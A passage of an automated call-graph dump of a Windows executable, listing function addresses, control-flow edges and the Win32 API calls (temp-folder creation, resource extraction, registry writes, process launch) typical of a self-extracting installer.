2380->2381 2390 7ff71d1d2872 2380->2390 2383 7ff71d1d2a50 2381->2383 2384 7ff71d1d2a41 GlobalFree 2381->2384 2383->2329 2384->2383 2385 7ff71d1d28a5 GetFileVersionInfoSizeA 2386 7ff71d1d28c2 GlobalAlloc 2385->2386 2385->2390 2386->2381 2387 7ff71d1d28e1 GlobalLock 2386->2387 2387->2381 2388 7ff71d1d28fc GetFileVersionInfoA 2387->2388 2389 7ff71d1d2920 VerQueryValueA 2388->2389 2388->2390 2389->2390 2391 7ff71d1d29ed GlobalUnlock 2389->2391 2390->2381 2390->2385 2390->2391 2392 7ff71d1d29d9 GlobalUnlock 2390->2392 2408 7ff71d1d261c 2390->2408 2391->2390 2392->2381 2394 7ff71d1d7f44 GetVersionExA 2393->2394 2402 7ff71d1d8076 2393->2402 2395 7ff71d1d7f6d 2394->2395 2394->2402 2398 7ff71d1d7f90 GetSystemMetrics 2395->2398 2395->2402 2396 7ff71d1d8470 7 API calls 2397 7ff71d1d3eca 2396->2397 2397->2334 
2404 7ff71d1d7e34 2397->2404 2399 7ff71d1d7fa7 RegOpenKeyExA 2398->2399 2398->2402 2400 7ff71d1d7fdc RegQueryValueExA RegCloseKey 2399->2400 2399->2402 2400->2402 2403 7ff71d1d8026 2400->2403 2401 7ff71d1d8065 CharNextA 2401->2403 2402->2396 2403->2401 2403->2402 2405 7ff71d1d7edd 2404->2405 2406 7ff71d1d7e5a EnumResourceLanguagesA 2404->2406 2405->2334 2406->2405 2407 7ff71d1d7e9f EnumResourceLanguagesA 2406->2407 2407->2405 2409 7ff71d1d27e0 GetSystemDirectoryA 2408->2409 2410 7ff71d1d265b CharUpperA CharNextA CharNextA 2408->2410 2413 7ff71d1d27f1 2409->2413 2411 7ff71d1d269c 2410->2411 2412 7ff71d1d27dd 2410->2412 2414 7ff71d1d26a6 2411->2414 2415 7ff71d1d27c7 GetWindowsDirectoryA 2411->2415 2412->2409 2416 7ff71d1d2805 2413->2416 2417 7ff71d1d7ba8 CharPrevA 2413->2417 2420 7ff71d1d7ba8 CharPrevA 2414->2420 2415->2413 2418 7ff71d1d8470 7 API calls 2416->2418 2417->2416 2419 7ff71d1d2814 2418->2419 2419->2390 2421 7ff71d1d2705 RegOpenKeyExA 2420->2421 2421->2413 2422 7ff71d1d2738 RegQueryValueExA 2421->2422 2423 7ff71d1d27b4 RegCloseKey 2422->2423 2424 7ff71d1d276b 2422->2424 2423->2413 2425 7ff71d1d2774 ExpandEnvironmentStringsA 2424->2425 2426 7ff71d1d2792 2424->2426 2425->2426 2426->2423 2428 7ff71d1d1221 GetProcAddress 2427->2428 2429 7ff71d1d12bb 2427->2429 2431 7ff71d1d123f AllocateAndInitializeSid 2428->2431 2432 7ff71d1d12ac FreeLibrary 2428->2432 2430 7ff71d1d8470 7 API calls 2429->2430 2433 7ff71d1d12ca 2430->2433 2431->2432 2434 7ff71d1d1288 FreeSid 2431->2434 2432->2429 2433->2339 2433->2344 2434->2432 2437 7ff71d1d5050 7 API calls 2436->2437 2438 7ff71d1d60bf LocalAlloc 2437->2438 2439 7ff71d1d610b 2438->2439 2440 7ff71d1d60dd 2438->2440 2442 7ff71d1d5050 7 API calls 2439->2442 2441 7ff71d1d4dcc 24 API calls 2440->2441 2443 7ff71d1d60fb 2441->2443 2444 7ff71d1d611d 2442->2444 2657 7ff71d1d7700 GetLastError 2443->2657 2446 7ff71d1d6121 2444->2446 2447 7ff71d1d615a lstrcmpA 2444->2447 2450 7ff71d1d4dcc 24 API calls 2446->2450 2448 7ff71d1d6174 
LocalFree 2447->2448 2449 7ff71d1d618a 2447->2449 2451 7ff71d1d3123 2448->2451 2452 7ff71d1d4dcc 24 API calls 2449->2452 2453 7ff71d1d613f LocalFree 2450->2453 2451->2161 2451->2162 2451->2203 2454 7ff71d1d61ac LocalFree 2452->2454 2453->2451 2455 7ff71d1d6100 2454->2455 2455->2451 2457 7ff71d1d5050 7 API calls 2456->2457 2458 7ff71d1d6001 2457->2458 2459 7ff71d1d6006 2458->2459 2460 7ff71d1d604a 2458->2460 2461 7ff71d1d4dcc 24 API calls 2459->2461 2462 7ff71d1d5050 7 API calls 2460->2462 2463 7ff71d1d6025 2461->2463 2464 7ff71d1d6063 2462->2464 2465 7ff71d1d3146 2463->2465 2466 7ff71d1d772c 13 API calls 2464->2466 2465->2203 2470 7ff71d1d66c4 2465->2470 2467 7ff71d1d606f 2466->2467 2467->2465 2468 7ff71d1d6073 2467->2468 2469 7ff71d1d4dcc 24 API calls 2468->2469 2469->2463 2471 7ff71d1d5050 7 API calls 2470->2471 2472 7ff71d1d6706 LocalAlloc 2471->2472 2473 7ff71d1d6756 2472->2473 2474 7ff71d1d6726 2472->2474 2475 7ff71d1d5050 7 API calls 2473->2475 2476 7ff71d1d4dcc 24 API calls 2474->2476 2477 7ff71d1d6768 2475->2477 2478 7ff71d1d6744 2476->2478 2479 7ff71d1d67a5 lstrcmpA LocalFree 2477->2479 2480 7ff71d1d676c 2477->2480 2682 7ff71d1d7700 GetLastError 2478->2682 2483 7ff71d1d67ec 2479->2483 2484 7ff71d1d6837 2479->2484 2482 7ff71d1d4dcc 24 API calls 2480->2482 2487 7ff71d1d678a LocalFree 2482->2487 2493 7ff71d1d64e4 53 API calls 2483->2493 2486 7ff71d1d6b14 2484->2486 2490 7ff71d1d684f GetTempPathA 2484->2490 2485 7ff71d1d6749 2488 7ff71d1d674f 2485->2488 2489 7ff71d1d7ac8 28 API calls 2486->2489 2487->2488 2491 7ff71d1d8470 7 API calls 2488->2491 2489->2488 2492 7ff71d1d6872 2490->2492 2500 7ff71d1d68a5 2490->2500 2494 7ff71d1d3153 2491->2494 2658 7ff71d1d64e4 2492->2658 2496 7ff71d1d680c 2493->2496 2494->2172 2494->2203 2496->2488 2498 7ff71d1d6814 2496->2498 2499 7ff71d1d4dcc 24 API calls 2498->2499 2499->2485 2500->2488 2501 7ff71d1d6adb GetWindowsDirectoryA 2500->2501 2502 7ff71d1d68f9 GetDriveTypeA 2500->2502 2506 7ff71d1d6ca4 38 API calls 2501->2506 2504 
7ff71d1d6916 GetFileAttributesA 2502->2504 2517 7ff71d1d6911 2502->2517 2504->2517 2506->2500 2507 7ff71d1d64e4 53 API calls 2507->2500 2508 7ff71d1d6ca4 38 API calls 2508->2517 2509 7ff71d1d6955 GetDiskFreeSpaceA 2511 7ff71d1d6983 MulDiv 2509->2511 2509->2517 2510 7ff71d1d2468 25 API calls 2510->2517 2511->2517 2512 7ff71d1d6a02 GetWindowsDirectoryA 2512->2517 2513 7ff71d1d7ba8 CharPrevA 2514 7ff71d1d6a2a GetFileAttributesA 2513->2514 2515 7ff71d1d6a40 CreateDirectoryA 2514->2515 2514->2517 2515->2517 2516 7ff71d1d6a6d SetFileAttributesA 2516->2517 2517->2488 2517->2501 2517->2502 2517->2504 2517->2508 2517->2509 2517->2510 2517->2512 2517->2513 2517->2516 2518 7ff71d1d64e4 53 API calls 2517->2518 2518->2517 2520 7ff71d1d6d3f GetDiskFreeSpaceA 2519->2520 2521 7ff71d1d6d12 2519->2521 2522 7ff71d1d6f63 memset 2520->2522 2523 7ff71d1d6d80 MulDiv 2520->2523 2524 7ff71d1d4dcc 24 API calls 2521->2524 2736 7ff71d1d7700 GetLastError 2522->2736 2523->2522 2526 7ff71d1d6dae GetVolumeInformationA 2523->2526 2527 7ff71d1d6d2f 2524->2527 2529 7ff71d1d6e45 SetCurrentDirectoryA 2526->2529 2530 7ff71d1d6de6 memset 2526->2530 2717 7ff71d1d7700 GetLastError 2527->2717 2528 7ff71d1d6f7b GetLastError FormatMessageA 2532 7ff71d1d6fbd 2528->2532 2539 7ff71d1d6e6c 2529->2539 2718 7ff71d1d7700 GetLastError 2530->2718 2535 7ff71d1d4dcc 24 API calls 2532->2535 2534 7ff71d1d6d34 2544 7ff71d1d6f41 2534->2544 2537 7ff71d1d6fd8 SetCurrentDirectoryA 2535->2537 2536 7ff71d1d6dfe GetLastError FormatMessageA 2536->2532 2537->2544 2538 7ff71d1d8470 7 API calls 2540 7ff71d1d326f 2538->2540 2541 7ff71d1d6eb4 2539->2541 2542 7ff71d1d6ed8 2539->2542 2540->2179 2540->2203 2543 7ff71d1d4dcc 24 API calls 2541->2543 2542->2544 2719 7ff71d1d24f8 2542->2719 2543->2534 2544->2538 2547 7ff71d1d5050 7 API calls 2546->2547 2548 7ff71d1d5dab FindResourceA LoadResource LockResource 2547->2548 2549 7ff71d1d5fcf 2548->2549 2550 7ff71d1d5dfc 2548->2550 2549->2200 2551 7ff71d1d5e56 2550->2551 2552 7ff71d1d5e08 
GetDlgItem ShowWindow GetDlgItem ShowWindow 2550->2552 2737 7ff71d1d5c60 #20 2551->2737 2552->2551 2555 7ff71d1d5e5f 2560 7ff71d1d4dcc 24 API calls 2555->2560 2556 7ff71d1d5e69 #20 2556->2555 2557 7ff71d1d5ed1 #22 2556->2557 2558 7ff71d1d5f55 2557->2558 2559 7ff71d1d5f15 #23 2557->2559 2562 7ff71d1d5f75 2558->2562 2563 7ff71d1d5f61 FreeResource 2558->2563 2559->2555 2559->2558 2561 7ff71d1d5f53 2560->2561 2561->2558 2564 7ff71d1d5f9f 2562->2564 2565 7ff71d1d5f81 2562->2565 2563->2562 2564->2549 2567 7ff71d1d5fb1 SendMessageA 2564->2567 2566 7ff71d1d4dcc 24 API calls 2565->2566 2566->2564 2567->2549 2569 7ff71d1d4118 2568->2569 2572 7ff71d1d412f 2568->2572 2570 7ff71d1d5050 7 API calls 2569->2570 2570->2572 2571 7ff71d1d4145 memset 2571->2572 2572->2571 2573 7ff71d1d4254 2572->2573 2574 7ff71d1d5050 7 API calls 2572->2574 2577 7ff71d1d44ee 2572->2577 2580 7ff71d1d42f5 CompareStringA 2572->2580 2581 7ff71d1d45d8 2572->2581 2582 7ff71d1d44df LocalFree 2572->2582 2584 7ff71d1d4599 2572->2584 2592 7ff71d1d44ad LocalFree 2572->2592 2595 7ff71d1d41fd CompareStringA 2572->2595 2611 7ff71d1d4394 2572->2611 2764 7ff71d1d1684 2572->2764 2803 7ff71d1d1d28 memset memset RegCreateKeyExA 2572->2803 2830 7ff71d1d473c CreateProcessA 2572->2830 2575 7ff71d1d4dcc 24 API calls 2573->2575 2574->2572 2610 7ff71d1d4273 2575->2610 2578 7ff71d1d8470 7 API calls 2577->2578 2579 7ff71d1d44ff 2578->2579 2579->2194 2580->2572 2580->2581 2581->2577 2583 7ff71d1d45f2 RegOpenKeyExA 2581->2583 2582->2577 2583->2577 2587 7ff71d1d4627 RegQueryValueExA 2583->2587 2586 7ff71d1d4dcc 24 API calls 2584->2586 2588 7ff71d1d45b8 LocalFree 2586->2588 2590 7ff71d1d471c RegCloseKey 2587->2590 2591 7ff71d1d466c memset GetSystemDirectoryA 2587->2591 2588->2577 2590->2577 2593 7ff71d1d46b3 2591->2593 2594 7ff71d1d469d 2591->2594 2592->2572 2592->2581 2597 7ff71d1d114c _vsnprintf 2593->2597 2598 7ff71d1d7ba8 CharPrevA 2594->2598 2595->2572 2599 7ff71d1d46dc RegSetValueExA 2597->2599 2598->2593 2599->2590 2600 
7ff71d1d4574 2603 7ff71d1d4dcc 24 API calls 2600->2603 2601 7ff71d1d43a5 GetProcAddress 2602 7ff71d1d4521 2601->2602 2601->2611 2606 7ff71d1d4dcc 24 API calls 2602->2606 2605 7ff71d1d4597 2603->2605 2607 7ff71d1d4553 LocalFree 2605->2607 2608 7ff71d1d4544 FreeLibrary 2606->2608 2855 7ff71d1d7700 GetLastError 2607->2855 2608->2607 2610->2577 2611->2600 2611->2601 2612 7ff71d1d44d3 FreeLibrary 2611->2612 2613 7ff71d1d4480 FreeLibrary 2611->2613 2845 7ff71d1d79f0 2611->2845 2612->2582 2613->2592 2615 7ff71d1d5050 7 API calls 2614->2615 2616 7ff71d1d3f8b LocalAlloc 2615->2616 2617 7ff71d1d3fdd 2616->2617 2618 7ff71d1d3fad 2616->2618 2619 7ff71d1d5050 7 API calls 2617->2619 2620 7ff71d1d4dcc 24 API calls 2618->2620 2621 7ff71d1d3fef 2619->2621 2622 7ff71d1d3fcb 2620->2622 2623 7ff71d1d3ff3 2621->2623 2624 7ff71d1d4030 lstrcmpA 2621->2624 2892 7ff71d1d7700 GetLastError 2622->2892 2626 7ff71d1d4dcc 24 API calls 2623->2626 2627 7ff71d1d404e 2624->2627 2628 7ff71d1d4098 LocalFree 2624->2628 2630 7ff71d1d4011 LocalFree 2626->2630 2631 7ff71d1d7ac8 28 API calls 2627->2631 2629 7ff71d1d3139 2628->2629 2629->2161 2629->2203 2630->2629 2632 7ff71d1d406e LocalFree 2631->2632 2632->2629 2633->2196 2641 7ff71d1d778a 2634->2641 2635 7ff71d1d114c _vsnprintf 2636 7ff71d1d77df FindResourceA 2635->2636 2637 7ff71d1d7801 2636->2637 2638 7ff71d1d775e LoadResource LockResource 2636->2638 2639 7ff71d1d8470 7 API calls 2637->2639 2638->2637 2638->2641 2640 7ff71d1d782e 2639->2640 2640->2186 2641->2635 2642 7ff71d1d7803 FreeResource 2641->2642 2643 7ff71d1d77b8 FreeResource 2641->2643 2642->2637 2643->2641 2645 7ff71d1d5050 7 API calls 2644->2645 2646 7ff71d1d4967 LocalAlloc 2645->2646 2647 7ff71d1d49a9 2646->2647 2648 7ff71d1d4989 2646->2648 2650 7ff71d1d5050 7 API calls 2647->2650 2649 7ff71d1d4dcc 24 API calls 2648->2649 2651 7ff71d1d49a7 2649->2651 2652 7ff71d1d49bb 2650->2652 2651->2203 2653 7ff71d1d49d5 lstrcmpA 2652->2653 2654 7ff71d1d49bf 2652->2654 2653->2654 2655 7ff71d1d4a0e 
LocalFree 2653->2655 2656 7ff71d1d4dcc 24 API calls 2654->2656 2655->2651 2656->2655 2657->2455 2659 7ff71d1d6516 2658->2659 2662 7ff71d1d65dd 2658->2662 2689 7ff71d1d63b8 2659->2689 2661 7ff71d1d6688 2665 7ff71d1d8470 7 API calls 2661->2665 2700 7ff71d1d6b70 2662->2700 2669 7ff71d1d66a8 2665->2669 2667 7ff71d1d65cc 2672 7ff71d1d7ba8 CharPrevA 2667->2672 2668 7ff71d1d6577 GetSystemInfo 2680 7ff71d1d6591 2668->2680 2669->2488 2683 7ff71d1d2468 GetWindowsDirectoryA 2669->2683 2670 7ff71d1d6649 2670->2661 2675 7ff71d1d6ca4 38 API calls 2670->2675 2671 7ff71d1d662a CreateDirectoryA 2673 7ff71d1d663f 2671->2673 2674 7ff71d1d667d 2671->2674 2672->2662 2673->2670 2712 7ff71d1d7700 GetLastError 2674->2712 2678 7ff71d1d665a 2675->2678 2677 7ff71d1d7ba8 CharPrevA 2677->2667 2678->2661 2681 7ff71d1d6666 RemoveDirectoryA 2678->2681 2679 7ff71d1d6682 2679->2661 2680->2667 2680->2677 2681->2661 2682->2485 2684 7ff71d1d24c4 2683->2684 2685 7ff71d1d24a6 2683->2685 2686 7ff71d1d8470 7 API calls 2684->2686 2687 7ff71d1d4dcc 24 API calls 2685->2687 2688 7ff71d1d24df 2686->2688 2687->2684 2688->2500 2688->2507 2691 7ff71d1d63e3 2689->2691 2692 7ff71d1d7ba8 CharPrevA 2691->2692 2695 7ff71d1d644b GetTempFileNameA 2691->2695 2713 7ff71d1d114c 2691->2713 2693 7ff71d1d6420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff71d1d64b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff71d1d6490 2694->2696 2695->2696 2697 7ff71d1d646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff71d1d8470 7 API calls 2696->2698 2697->2696 2699 7ff71d1d64a2 2698->2699 2699->2661 2699->2667 2699->2668 2701 7ff71d1d6b8b 2700->2701 2701->2701 2702 7ff71d1d6b94 LocalAlloc 2701->2702 2703 7ff71d1d6bb4 2702->2703 2704 7ff71d1d6bf5 2702->2704 2705 7ff71d1d4dcc 24 API calls 2703->2705 2707 7ff71d1d7ba8 CharPrevA 2704->2707 2711 7ff71d1d6bd2 2705->2711 2708 7ff71d1d6c14 CreateFileA LocalFree 2707->2708 2710 7ff71d1d6c61 CloseHandle GetFileAttributesA 2708->2710 2708->2711 2709 7ff71d1d6626 2709->2670 
2709->2671 2710->2711 2711->2709 2716 7ff71d1d7700 GetLastError 2711->2716 2712->2679 2714 7ff71d1d1178 _vsnprintf 2713->2714 2715 7ff71d1d1199 2713->2715 2714->2715 2715->2691 2716->2709 2717->2534 2718->2536 2720 7ff71d1d2525 2719->2720 2721 7ff71d1d2562 2719->2721 2722 7ff71d1d114c _vsnprintf 2720->2722 2723 7ff71d1d25ab 2721->2723 2724 7ff71d1d2567 2721->2724 2725 7ff71d1d253d 2722->2725 2727 7ff71d1d114c _vsnprintf 2723->2727 2735 7ff71d1d255d 2723->2735 2726 7ff71d1d114c _vsnprintf 2724->2726 2728 7ff71d1d4dcc 24 API calls 2725->2728 2730 7ff71d1d257f 2726->2730 2731 7ff71d1d25c7 2727->2731 2728->2735 2729 7ff71d1d8470 7 API calls 2732 7ff71d1d2609 2729->2732 2733 7ff71d1d4dcc 24 API calls 2730->2733 2734 7ff71d1d4dcc 24 API calls 2731->2734 2732->2544 2733->2735 2734->2735 2735->2729 2736->2528 2738 7ff71d1d5ced 2737->2738 2748 7ff71d1d5d62 2737->2748 2749 7ff71d1d5380 2738->2749 2740 7ff71d1d8470 7 API calls 2743 7ff71d1d5d78 2740->2743 2742 7ff71d1d5d0d #21 2744 7ff71d1d5d28 2742->2744 2742->2748 2743->2555 2743->2556 2744->2748 2761 7ff71d1d5770 2744->2761 2747 7ff71d1d5d4f #23 2747->2748 2748->2740 2750 7ff71d1d53b3 2749->2750 2751 7ff71d1d53d0 2750->2751 2752 7ff71d1d53fd lstrcmpA 2750->2752 2753 7ff71d1d4dcc 24 API calls 2751->2753 2754 7ff71d1d53f4 2752->2754 2755 7ff71d1d5454 2752->2755 2753->2754 2754->2742 2754->2748 2755->2754 2756 7ff71d1d54a8 CreateFileA 2755->2756 2756->2754 2758 7ff71d1d54de 2756->2758 2757 7ff71d1d5561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff71d1d5549 CharNextA 2758->2759 2760 7ff71d1d5532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff71d1d57a4 CloseHandle 2761->2762 2763 7ff71d1d578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff71d1d16d3 2764->2765 2856 7ff71d1d15e8 2765->2856 2768 7ff71d1d7ba8 CharPrevA 2770 7ff71d1d1766 2768->2770 2769 7ff71d1d7d68 2 API calls 2771 7ff71d1d1811 2769->2771 2770->2769 2772 7ff71d1d1a1b 2771->2772 2773 7ff71d1d181a CompareStringA 2771->2773 2774 7ff71d1d7d68 2 
API calls 2772->2774 2773->2772 2775 7ff71d1d184d GetFileAttributesA 2773->2775 2776 7ff71d1d1a28 2774->2776 2777 7ff71d1d19f3 2775->2777 2778 7ff71d1d1867 2775->2778 2779 7ff71d1d1a31 CompareStringA 2776->2779 2780 7ff71d1d1acb LocalAlloc 2776->2780 2781 7ff71d1d4dcc 24 API calls 2777->2781 2778->2777 2783 7ff71d1d15e8 2 API calls 2778->2783 2779->2780 2790 7ff71d1d1a60 2779->2790 2780->2777 2782 7ff71d1d1aeb GetFileAttributesA 2780->2782 2801 7ff71d1d194f 2781->2801 2795 7ff71d1d1b01 2782->2795 2784 7ff71d1d188b 2783->2784 2785 7ff71d1d18b5 LocalAlloc 2784->2785 2787 7ff71d1d15e8 2 API calls 2784->2787 2785->2777 2788 7ff71d1d18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2785->2788 2786 7ff71d1d1bd1 2789 7ff71d1d8470 7 API calls 2786->2789 2787->2785 2791 7ff71d1d1984 2788->2791 2788->2801 2792 7ff71d1d1be9 2789->2792 2790->2790 2793 7ff71d1d1a81 LocalAlloc 2790->2793 2796 7ff71d1d1995 GetShortPathNameA 2791->2796 2797 7ff71d1d19ba 2791->2797 2792->2572 2793->2777 2798 7ff71d1d1ab2 2793->2798 2802 7ff71d1d1b54 2795->2802 2796->2797 2800 7ff71d1d114c _vsnprintf 2797->2800 2799 7ff71d1d114c _vsnprintf 2798->2799 2799->2801 2800->2801 2801->2786 2864 7ff71d1d2a6c 2802->2864 2804 7ff71d1d2019 2803->2804 2810 7ff71d1d1dce 2803->2810 2805 7ff71d1d8470 7 API calls 2804->2805 2807 7ff71d1d2028 2805->2807 2806 7ff71d1d114c _vsnprintf 2808 7ff71d1d1dee RegQueryValueExA 2806->2808 2807->2572 2809 7ff71d1d1e25 2808->2809 2808->2810 2811 7ff71d1d1e46 GetSystemDirectoryA 2809->2811 2812 7ff71d1d1e29 RegCloseKey 2809->2812 2810->2806 2810->2809 2813 7ff71d1d7ba8 CharPrevA 2811->2813 2812->2804 2814 7ff71d1d1e6a LoadLibraryA 2813->2814 2815 7ff71d1d1f55 GetModuleFileNameA 2814->2815 2816 7ff71d1d1e86 GetProcAddress FreeLibrary 2814->2816 2817 7ff71d1d1f78 RegCloseKey 2815->2817 2821 7ff71d1d1ee8 2815->2821 2816->2815 2818 7ff71d1d1ebe GetSystemDirectoryA 2816->2818 2817->2804 2819 7ff71d1d1ed5 2818->2819 2818->2821 2820 7ff71d1d7ba8 CharPrevA 2819->2820 2820->2821 
2821->2821 2822 7ff71d1d1f11 LocalAlloc 2821->2822 2823 7ff71d1d1f35 2822->2823 2824 7ff71d1d1f8e 2822->2824 2825 7ff71d1d4dcc 24 API calls 2823->2825 2826 7ff71d1d114c _vsnprintf 2824->2826 2827 7ff71d1d1f53 2825->2827 2828 7ff71d1d1fc4 2826->2828 2827->2817 2828->2828 2829 7ff71d1d1fcd RegSetValueExA RegCloseKey LocalFree 2828->2829 2829->2804 2831 7ff71d1d48b3 2830->2831 2832 7ff71d1d47c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff71d1d7700 GetLastError 2831->2891 2833 7ff71d1d47f9 2832->2833 2840 7ff71d1d2318 18 API calls 2833->2840 2844 7ff71d1d482a CloseHandle CloseHandle 2833->2844 2835 7ff71d1d48b8 GetLastError FormatMessageA 2836 7ff71d1d4dcc 24 API calls 2835->2836 2838 7ff71d1d491c 2836->2838 2841 7ff71d1d8470 7 API calls 2838->2841 2839 7ff71d1d48aa 2839->2838 2842 7ff71d1d484d 2840->2842 2843 7ff71d1d492f 2841->2843 2842->2844 2843->2572 2844->2838 2844->2839 2846 7ff71d1d7a25 2845->2846 2847 7ff71d1d7ba8 CharPrevA 2846->2847 2848 7ff71d1d7a63 GetFileAttributesA 2847->2848 2849 7ff71d1d7a96 LoadLibraryA 2848->2849 2850 7ff71d1d7a79 2848->2850 2851 7ff71d1d7aa9 2849->2851 2850->2849 2852 7ff71d1d7a7d LoadLibraryExA 2850->2852 2853 7ff71d1d8470 7 API calls 2851->2853 2852->2851 2854 7ff71d1d7ab9 2853->2854 2854->2611 2855->2610 2857 7ff71d1d1609 2856->2857 2859 7ff71d1d1621 2857->2859 2861 7ff71d1d1651 2857->2861 2877 7ff71d1d7ce8 2857->2877 2860 7ff71d1d7ce8 2 API calls 2859->2860 2862 7ff71d1d162f 2860->2862 2861->2768 2861->2770 2862->2861 2863 7ff71d1d7ce8 2 API calls 2862->2863 2863->2862 2865 7ff71d1d2aa0 GetModuleFileNameA 2864->2865 2866 7ff71d1d2c24 2864->2866 2865->2866 2875 7ff71d1d2ac8 2865->2875 2867 7ff71d1d8470 7 API calls 2866->2867 2869 7ff71d1d2c37 2867->2869 2868 7ff71d1d2acc IsDBCSLeadByte 2868->2875 2869->2786 2870 7ff71d1d2bf6 CharNextA 2872 7ff71d1d2c08 CharNextA 2870->2872 2871 7ff71d1d2af1 CharNextA CharUpperA 2873 7ff71d1d2b9b CharUpperA 2871->2873 2871->2875 2872->2866 2872->2868 2873->2875 2875->2868 2875->2870 
2875->2871 2875->2872 2875->2875 2876 7ff71d1d2b36 CharPrevA 2875->2876 2882 7ff71d1d7c40 2875->2882 2876->2875 2880 7ff71d1d7d00 2877->2880 2878 7ff71d1d7d47 2878->2857 2879 7ff71d1d7d0a IsDBCSLeadByte 2879->2878 2879->2880 2880->2878 2880->2879 2881 7ff71d1d7d30 CharNextA 2880->2881 2881->2880 2883 7ff71d1d7c58 2882->2883 2883->2883 2884 7ff71d1d7c61 CharPrevA 2883->2884 2885 7ff71d1d7c7d CharPrevA 2884->2885 2886 7ff71d1d7c94 2885->2886 2887 7ff71d1d7c75 2885->2887 2888 7ff71d1d7cb5 CharNextA 2886->2888 2889 7ff71d1d7c9e CharPrevA 2886->2889 2890 7ff71d1d7cc7 2886->2890 2887->2885 2887->2886 2888->2890 2889->2888 2889->2890 2890->2875 2891->2835 2892->2629 2894 7ff71d1d2281 2893->2894 2895 7ff71d1d22eb 2893->2895 2896 7ff71d1d7ba8 CharPrevA 2894->2896 2897 7ff71d1d8470 7 API calls 2895->2897 2898 7ff71d1d2294 WritePrivateProfileStringA _lopen 2896->2898 2899 7ff71d1d22fd 2897->2899 2898->2895 2900 7ff71d1d22c7 _llseek _lclose 2898->2900 2899->2225 2900->2895 2956 7ff71d1d3840 2957 7ff71d1d3852 2956->2957 2959 7ff71d1d385a 2956->2959 2958 7ff71d1d388e GetDesktopWindow 2957->2958 2957->2959 2964 7ff71d1d4c68 6 API calls 2958->2964 2960 7ff71d1d38ec EndDialog 2959->2960 2961 7ff71d1d385f 2959->2961 2960->2961 2965 7ff71d1d4d3f SetWindowPos 2964->2965 2967 7ff71d1d8470 7 API calls 2965->2967 2968 7ff71d1d38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 2967->2968 2968->2961 2969 7ff71d1d1500 2970 7ff71d1d1530 2969->2970 2971 7ff71d1d1557 GetDesktopWindow 2969->2971 2973 7ff71d1d1542 EndDialog 2970->2973 2974 7ff71d1d1553 2970->2974 2972 7ff71d1d4c68 14 API calls 2971->2972 2975 7ff71d1d156e LoadStringA SetDlgItemTextA MessageBeep 2972->2975 2973->2974 2976 7ff71d1d8470 7 API calls 2974->2976 2975->2974 2977 7ff71d1d15d0 2976->2977 2994 7ff71d1d8750 2995 7ff71d1d875f 2994->2995 2996 7ff71d1d8782 2994->2996 2995->2996 2997 7ff71d1d877b ?terminate@ 2995->2997 2997->2996 2998 7ff71d1d8790 SetUnhandledExceptionFilter 2901 7ff71d1d5690 2908 7ff71d1d3b40 2901->2908 
2904 7ff71d1d56c2 WriteFile 2905 7ff71d1d56ba 2904->2905 2906 7ff71d1d56f9 2904->2906 2906->2905 2907 7ff71d1d5725 SendDlgItemMessageA 2906->2907 2907->2905 2909 7ff71d1d3b4c MsgWaitForMultipleObjects 2908->2909 2910 7ff71d1d3b74 PeekMessageA 2909->2910 2911 7ff71d1d3be5 2909->2911 2910->2909 2912 7ff71d1d3b99 2910->2912 2911->2904 2911->2905 2912->2909 2912->2911 2913 7ff71d1d3ba7 DispatchMessageA 2912->2913 2914 7ff71d1d3bb8 PeekMessageA 2912->2914 2913->2914 2914->2912 3001 7ff71d1d80d0 3002 7ff71d1d80e2 3001->3002 3008 7ff71d1d8818 GetModuleHandleW 3002->3008 3004 7ff71d1d8149 __set_app_type 3005 7ff71d1d8186 3004->3005 3006 7ff71d1d818f __setusermatherr 3005->3006 3007 7ff71d1d819c 3005->3007 3006->3007 3009 7ff71d1d882d 3008->3009 3009->3004 3010 7ff71d1d3910 3011 7ff71d1d3933 3010->3011 3012 7ff71d1d3a09 3010->3012 3011->3012 3013 7ff71d1d3a11 GetDesktopWindow 3011->3013 3014 7ff71d1d3948 3011->3014 3015 7ff71d1d3954 3012->3015 3016 7ff71d1d3b1a EndDialog 3012->3016 3017 7ff71d1d4c68 14 API calls 3013->3017 3018 7ff71d1d397b 3014->3018 3019 7ff71d1d394c 3014->3019 3016->3015 3020 7ff71d1d3a2f 3017->3020 3018->3015 3022 7ff71d1d3985 ResetEvent 3018->3022 3019->3015 3021 7ff71d1d395b TerminateThread 3019->3021 3023 7ff71d1d3a9b SetWindowTextA CreateThread 3020->3023 3024 7ff71d1d3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 3020->3024 3021->3016 3025 7ff71d1d4dcc 24 API calls 3022->3025 3023->3015 3026 7ff71d1d3ae8 3023->3026 3024->3023 3027 7ff71d1d39c3 3025->3027 3028 7ff71d1d4dcc 24 API calls 3026->3028 3029 7ff71d1d39e4 SetEvent 3027->3029 3031 7ff71d1d39cc SetEvent 3027->3031 3028->3012 3030 7ff71d1d3b40 4 API calls 3029->3030 3030->3012 3031->3015 2978 7ff71d1d33a0 2979 7ff71d1d33bb CallWindowProcA 2978->2979 2980 7ff71d1d33ac 2978->2980 2981 7ff71d1d33b7 2979->2981 2980->2979 2980->2981 2982 7ff71d1d55e0 2983 7ff71d1d5641 ReadFile 2982->2983 2984 7ff71d1d560d 2982->2984 2983->2984 2985 7ff71d1d57e0 2986 7ff71d1d581e 2985->2986 2988 7ff71d1d57fc 
